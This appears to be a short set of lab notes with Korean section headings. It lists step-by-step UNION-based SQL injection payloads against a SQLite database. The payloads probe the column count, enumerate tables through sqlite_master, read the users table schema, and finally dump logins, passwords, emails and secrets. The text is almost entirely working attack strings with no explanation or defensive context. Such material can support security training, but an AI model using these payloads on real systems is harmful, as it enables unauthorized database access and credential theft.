 6) SQL 인젝션

 ① 

0' union select all 1 --
0' union select all 1,2 --
0' union select all 1,2,3 --
0' union select all 1,2,3,4 --
0' union select all 1,2,3,4,5 --
0' union select all 1,2,3,4,5,6 --


 ② 

0' union select all 1,tbl_name,3,4,5,6 from sqlite_master --


 ③ 

0' union select all 1,tbl_name,sql,4,5,6 from sqlite_master where tbl_name='users' --


 ④ 

0' union select all 1,login,password,email,secret,6 from users --


 7) High 레벨

0' union select all 1,tbl_name,sql,4,5,6 from sqlite_master where tbl_name='users' --
